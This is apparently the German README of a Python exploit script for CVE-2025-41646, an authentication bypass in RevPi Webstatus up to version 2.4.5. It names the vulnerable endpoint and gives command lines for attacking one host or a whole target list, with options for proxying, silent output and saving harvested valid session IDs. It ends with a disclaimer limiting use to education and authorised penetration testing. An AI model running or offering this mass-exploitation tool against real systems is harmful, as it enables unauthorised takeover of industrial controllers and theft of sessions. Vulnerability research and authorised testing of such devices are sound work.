
Python-Exploit-Skript für CVE-2025-41646, einen Authentifizierungs-Bypass in RevPi Webstatus <= 2.4.5. Unterstützt Einzel-/Massenausnutzung, Proxy, stillen Modus und JSON-Ausgabe für Penetrationstests.
Dies ist ein Python3-Exploit-Skript für CVE-2025-41646, eine Schwachstelle zur Authentifizierungsumgehung, die RevPi Webstatus <= 2.4.5 betrifft.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (normalerweise in requests enthalten)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
Anfrage/Antwort
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Die unbefugte Verwendung gegen Systeme ohne ausdrückliche Erlaubnis ist illegal.
| Option | Beschreibung |
|---|
-u, --url | Ziel-URL (z. B. http://IP) |
-l, --list | Datei mit der Zielliste |
-o, --output | Ausgabedatei zum Speichern gültiger Sitzungs-IDs |
--proxy | Proxy verwenden (http://127.0.0.1:8080) |
--json | Rohe JSON-Ausgabe ausgeben |
--silent | Stiller Modus (gibt nur die Sitzungs-ID aus) |